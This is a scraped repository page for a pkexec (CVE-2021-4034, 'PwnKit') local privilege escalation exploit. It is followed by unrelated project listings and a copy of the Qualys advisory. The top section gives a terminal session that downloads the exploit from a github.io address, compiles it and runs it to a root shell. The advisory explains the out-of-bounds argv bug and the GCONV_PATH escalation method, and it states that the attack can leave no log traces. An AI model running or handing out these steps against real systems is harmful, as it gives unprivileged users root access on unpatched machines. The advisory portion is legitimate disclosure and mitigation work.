🐧MAJOR BUG GRANTS ROOT FOR ALL MAJOR LINUX DISTRIBUTIONS

🐧 MAJOR BUG GRANTS ROOT FOR ALL MAJOR LINUX DISTRIBUTIONS

CTF quality exploit

bla bla irresponsible disclosure

terminal:

[email protected]:~$ wget https://g1f1.github.io/blasty-vs-pkexec.c/blasty-vs-pkexec.c
[email protected]:~$ gcc -o blasty blasty-vs-pkexec.c
[email protected]:~$ ./blasty
[~] compile helper..
[~] maybe get shell now?
# whoami
root

exploitation when debugging:

pkexec must be setuid root
Owner
George Filippas
📌 into @githackorg these days 🚀💙
George Filippas
Similar Resources

This repository shows my all (maybe all) solved problem (CodeForces & AtCoder) and their description with my Codes!!!

Submissions Auto-generated with ❤ using Harwest Introduction A repository to keep track of problem solving practice, containing solutions from platfor

Aug 4, 2022

Vstat is a simple program I made for mostly myself on my Arch linux system, the "timezone" file may not work on all arch systems.

Vstat is a simple program I made for mostly myself on my Arch linux system, the

Vstat Vstat is a simple program I made for mostly myself on my Arch linux system. I made Vstat because the idea of having your system information disp

Nov 11, 2021

The source for the Linux kernel used in Windows Subsystem for Linux 2 (WSL2)

Introduction The WSL2-Linux-Kernel repo contains the kernel source code and configuration files for the WSL2 kernel. Reporting Bugs If you discover an

Nov 27, 2022

Raspberry Pi Pico Arduino core, for all RP2040 boards

Raspberry Pi Pico Arduino core, for all RP2040 boards

Arduino-Pico Raspberry Pi Pico Arduino core, for all RP2040 boards This is a port of the RP2040 (Raspberry Pi Pico processor) to the Arduino ecosystem

Nov 25, 2022

An experimental tool to estimate the similarity between all pairs of contigs

This is an experimental tool to estimate the approximate distances between all pairs of unitigs. It takes a GFA or FASTA file as input and outputs a T

Mar 16, 2022

This is an experimental OS-from-scratch project. Just for demonstration, not useful at all.

This is an experimental OS-from-scratch project. Just for demonstration, not useful at all.

OS Playground This is an experimental OS-from-scratch project. Just for demonstration, not useful at all. Different from OS in other projects, this OS

Nov 5, 2022

A refactored Proof-of-concept originally developed in 2017 to print all function calls with their arguments data types and values using Ptrace during program execution.

print-function-args-debugger A refactored Proof-of-concept originally developed in 2017 to print all function calls with their arguments data types an

Jun 17, 2022

A proposition for a fully intergrated kext for all Surface Pro hardwares

BigSurface The name comes from macOS Big Sur. Big Sur + Surface - Big Surface (LOL) PS:If you have a better name, please let me know. A proposition f

Nov 28, 2022

MDE is a model extraction tool that converts Destiny 2 dynamic models into fbx files supporting textures, skeletons, and all provided vertex data.

MDE is a model extraction tool that converts Destiny 2 dynamic models into fbx files. A dynamic model is one that is animated or is spawned in during the game.

Sep 2, 2022
Comments
  • pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)

    pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)

    Qualys Security Advisory

    pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)

    Contents

    Summary Analysis Exploitation Acknowledgments Timeline

    Summary

    We discovered a Local Privilege Escalation (from any user to root) in polkit's pkexec, a SUID-root program that is installed by default on every major Linux distribution:

    "Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones. [...] It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission)." (Wikipedia)

    This vulnerability is an attacker's dream come true:

    • pkexec is installed by default on all major Linux distributions (we exploited Ubuntu, Debian, Fedora, CentOS, and other distributions are probably also exploitable);

    • pkexec is vulnerable since its creation, in May 2009 (commit c8c3d83, "Add a pkexec(1) command");

    • any unprivileged local user can exploit this vulnerability to obtain full root privileges;

    • although this vulnerability is technically a memory corruption, it is exploitable instantly, reliably, in an architecture-independent way;

    • and it is exploitable even if the polkit daemon itself is not running.

    We will not publish our exploit immediately; however, please note that this vulnerability is trivially exploitable, and other researchers might publish their exploits shortly after the patches are available. If no patches are available for your operating system, you can remove the SUID-bit from pkexec as a temporary mitigation; for example:

    chmod 0755 /usr/bin/pkexec

    This vulnerability is one of our most beautiful discoveries; to honor its memory, we recommend listening to DJ Pone's "Falken's Maze" (double pun intended) while reading this advisory. Thank you very much!

    Analysis

    pkexec is a sudo-like, SUID-root program, described as follows by its man page:


    NAME pkexec - Execute a command as another user

    SYNOPSIS pkexec [--version] [--disable-internal-agent] [--help]

       pkexec [--user username] PROGRAM [ARGUMENTS...]
    

    DESCRIPTION pkexec allows an authorized user to execute PROGRAM as another user. If PROGRAM is not specified, the default shell will be run. If username is not specified, then the program will be executed as the administrative super user, root.

    The beginning of pkexec's main() function processes the command-line arguments (lines 534-568), and searches for the program to be executed (if its path is not absolute) in the directories of the PATH environment variable (lines 610-640):


    435 main (int argc, char *argv[]) 436 { ... 534 for (n = 1; n < (guint) argc; n++) 535 { ... 568 } ... 610 path = g_strdup (argv[n]); ... 629 if (path[0] != '/') 630 { ... 632 s = g_find_program_in_path (path); ... 639 argv[n] = path = s; 640 }

    Unfortunately, if the number of command-line arguments argc is 0 (if the argument list argv that we pass to execve() is empty, i.e. {NULL}), then argv[0] is NULL (the argument list's terminator) and:

    • at line 534, the integer n is permanently set to 1;

    • at line 610, the pointer path is read out-of-bounds from argv[1];

    • at line 639, the pointer s is written out-of-bounds to argv[1].

    But what exactly is read from and written to this out-of-bounds argv[1]? To answer this question, we must digress briefly. When we execve() a new program, the kernel copies our argument and environment strings and pointers (argv and envp) to the end of the new program's stack; for example:

    | argv[0] | argv[1] | argv[argc] | envp[0] | envp[1] | envp[envc] | |:-:|:-:|:-:|:-:|:-:|:-:| | "program" | "-option" | NULL | "value" | "PATH=name" | NULL

    Clearly (because the argv and envp pointers are contiguous in memory), if argc is 0, then the out-of-bounds argv[1] is actually envp[0], the pointer to our first environment variable, "value". Consequently:

    • at line 610, the path of the program to be executed is read out-of-bounds from argv[1] (i.e. envp[0]), and points to "value";

    • at line 632, this path "value" is passed to g_find_program_in_path() (because "value" does not start with a slash, at line 629);

    • g_find_program_in_path() searches for an executable file named "value" in the directories of our PATH environment variable;

    • if such an executable file is found, its full path is returned to pkexec's main() function (at line 632);

    • and at line 639, this full path is written out-of-bounds to argv[1] (i.e. envp[0]), thus overwriting our first environment variable.

    More precisely:

    • if our PATH environment variable is "PATH=name", and if the directory "name" exists (in the current working directory) and contains an executable file named "value", then a pointer to the string "name/value" is written out-of-bounds to envp[0];

    • or, if our PATH is "PATH=name=.", and if the directory "name=." exists and contains an executable file named "value", then a pointer to the string "name=./value" is written out-of-bounds to envp[0].

    In other words, this out-of-bounds write allows us to re-introduce an "unsecure" environment variable (for example, LD_PRELOAD) into pkexec's environment; these "unsecure" variables are normally removed (by ld.so) from the environment of SUID programs before the main() function is called. We will exploit this powerful primitive in the following section.

    Last-minute note: polkit also supports non-Linux operating systems such as Solaris and *BSD, but we have not investigated their exploitability; however, we note that OpenBSD is not exploitable, because its kernel refuses to execve() a program if argc is 0.

    #Exploitation

    Our question is: to successfully exploit this vulnerability, which "unsecure" variable should we re-introduce into pkexec's environment? Our options are limited, because shortly after the out-of-bounds write (at line 639), pkexec completely clears its environment (at line 702):


    639 argv[n] = path = s; ... 657 for (n = 0; environment_variables_to_save[n] != NULL; n++) 658 { 659 const gchar *key = environment_variables_to_save[n]; ... 662 value = g_getenv (key); ... 670 if (!validate_environment_variable (key, value)) ... 675 } ... 702 if (clearenv () != 0)

    The answer to our question comes from pkexec's complexity: to print an error message to stderr, pkexec calls the GLib's function g_printerr() (note: the GLib is a GNOME library, not the GNU C Library, aka glibc); for example, the functions validate_environment_variable() and log_message() call g_printerr() (at lines 126 and 408-409):


    88 log_message (gint level, 89 gboolean print_to_stderr, 90 const gchar *format, 91 ...) 92 { ... 125 if (print_to_stderr) 126 g_printerr ("%s\n", s);

    383 validate_environment_variable (const gchar *key, 384 const gchar *value) 385 { ... 406 log_message (LOG_CRIT, TRUE, 407 "The value for the SHELL variable was not found the /etc/shells file"); 408 g_printerr ("\n" 409 "This incident has been reported.\n");

    g_printerr() normally prints UTF-8 error messages, but it can print messages in another charset if the environment variable CHARSET is not UTF-8 (note: CHARSET is not security sensitive, it is not an "unsecure" environment variable). To convert messages from UTF-8 to another charset, g_printerr() calls the glibc's function iconv_open().

    To convert messages from one charset to another, iconv_open() executes small shared libraries; normally, these triplets ("from" charset, "to" charset, and library name) are read from a default configuration file, /usr/lib/gconv/gconv-modules. Alternatively, the environment variable GCONV_PATH can force iconv_open() to read another configuration file; naturally, GCONV_PATH is one of the "unsecure" environment variables (because it leads to the execution of arbitrary libraries), and is therefore removed by ld.so from the environment of SUID programs.

    Unfortunately, CVE-2021-4034 allows us to re-introduce GCONV_PATH into pkexec's environment, and to execute our own shared library, as root.

    Important: this exploitation technique leaves traces in the logs (either "The value for the SHELL variable was not found the /etc/shells file" or "The value for environment variable [...] contains suscipious content"). However, please note that this vulnerability is also exploitable without leaving any traces in the logs, but this is left as an exercise for the interested reader.

    For further discussions about pkexec, GLib, and GCONV_PATH, please refer to the following posts by Tavis Ormandy, Jakub Wilk, and Yuki Koike:

    https://www.openwall.com/lists/oss-security/2014/07/14/1 https://www.openwall.com/lists/oss-security/2017/06/23/8 https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/

    Acknowledgments

    We thank polkit's authors, Red Hat Product Security, and the members of [email protected] for their invaluable help with the disclosure of this vulnerability. We also thank Birdy Nam Nam for their inspiring work.

    Timeline

    2021-11-18: Advisory sent to [email protected]

    2022-01-11: Advisory and patch sent to [email protected]

    2022-01-25: Coordinated Release Date (5:00 PM UTC).

A simple wrapper for 'pacman' with a syntax similar to 'apt' to help people transitioning to Arch and Arch based distributions like Manjaro.

aptpac aptpac is a program which helps with the transition to Arch Linux and Arch based distros like Manjaro. It simplifies using pacman as it works l

Sep 26, 2022
Windows 2000 styled installer for Panther based distributions of Microsoft Windows (WIM files).

An advanced installer for Microsoft Windows that mimics the looks of the Windows XP and older installers. Takes any modern (Vista and newer) Windows ISO or WIM file and creates a old styled Windows Setup experience on the go.

Nov 18, 2022
A simple Defold extension to get the project root dir when running from the editor

Defold Project Directory extension This is a small native extension that makes it so that you can get the project directory of a game that is being ru

Oct 2, 2021
CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation

CVE-2021-4034 CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation 根据CVE-2021-4034进行了加强,执行Exploit将会默认添加用户名rooter,密码[email protected],并且rooter用户将具

Oct 16, 2022
Demo exploit code for CVE-2020-27904, a tfp0 bug.

xattr-oob-swap CVE-2020-27904: a tfp0 bug for macOS 10.15.x and below. Demo exploit code for my talk at BlackHat ASIA 2021. The vulnerability has been

Nov 9, 2022
Reproducible example of overlay and overlay mac driver bug

problem It's been observed under certain circumstances that MacOS overlay and overlay2 storage drivers cause the syscall copy_file_range to return zer

Dec 7, 2021
A fork of the kwin blur effect that solve the corners bug.
A fork of the kwin blur effect that solve the corners bug.

Kwin blur effect - Respect rounded corners This kwin effect is a fork of the default kwin blur effect, with minimal changes to solve the "plasma korne

Nov 8, 2022
An implementation of the SZZ algorithm, i.e., an approach to identify bug-introducing commits.
An implementation of the SZZ algorithm, i.e., an approach to identify bug-introducing commits.

SZZ Unleashed SZZ Unleashed is an implementation of the SZZ algorithm, i.e. an approach to identify bug-introducing commits, introduced by Śliwerski e

Nov 12, 2022
C#-like properties for C++20. This was made to demonstrate a bug in ClangFormat.

cpp20-property C#-like properties for C++20. Example usage #include <iostream> #include <Propery.hpp> class ProperyTest { public: zsl::Property<

Jun 9, 2022
libelf as part of elfutils has been a major pain in the ass.

libelf in zig libelf as part of elfutils has been a major pain in the ass. All I want to do is make statically compiled programs that use eBPF (libbpf

Jul 21, 2021